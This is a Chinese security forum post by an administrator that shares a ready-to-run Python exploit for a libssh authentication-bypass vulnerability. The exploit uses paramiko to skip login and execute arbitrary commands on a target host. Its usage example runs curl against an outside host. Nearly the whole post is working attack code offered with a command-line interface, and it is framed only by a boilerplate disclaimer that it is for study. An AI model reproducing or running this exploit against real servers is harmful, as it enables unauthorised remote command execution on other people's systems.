搜索
查看: 2238|回复: 0

VULNSPYBlOGQQ 群TELEGRAM GROUPYOUTUBE CHANNEL Libssh 登录绕过漏洞利用 (CVE-20...

[复制链接]

576

主题

848

帖子

2157

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2157

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2019-1-14 00:30:26 | 显示全部楼层 |阅读模式

漏洞利用
脚本使用方法:
python vulnspy_libssh.py target.com 端口 '命令'



测试脚本:
#!/usr/bin/env python
import paramiko
import socket
import argparse
import logging
import sys
import time
import datetime

def BypasslibSSHwithoutcredentials(hostname, port, cmd):
    sock = socket.socket()
    try:
        #logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
        sock.connect((str(hostname), int(port)))
        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
        # ref:[url]http://joelinoff.com/blog/?p=905[/url]
        session = transport.open_session()
        session.exec_command(cmd)
        data = ''
        maxseconds = 5
        start = datetime.datetime.now()
        start_secs = time.mktime(start.timetuple())
        while True: 
                if session.recv_ready():
                    data = data+session.recv(2048)
                if session.exit_status_ready():
                    break
                now = datetime.datetime.now()
                now_secs = time.mktime(now.timetuple()) 
                et_secs = now_secs - start_secs
                if et_secs > maxseconds:
                    data = data+'\ntimeout'
                    break
        print data
        return 0

    except paramiko.SSHException as e:
        print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
        return 1
    except socket.error:
        print("Unable to connect.")
        return 1

def main():
    try:
        hostname = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]
    except:
        print("Usage: python vulnspy_libssh.py target.vsplate.me 2222 'curl [url]www.vulnspy.com[/url]'")
        exit(1)
    BypasslibSSHwithoutcredentials(hostname, port, cmd)

if __name__ == '__main__':
    exit(main())

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表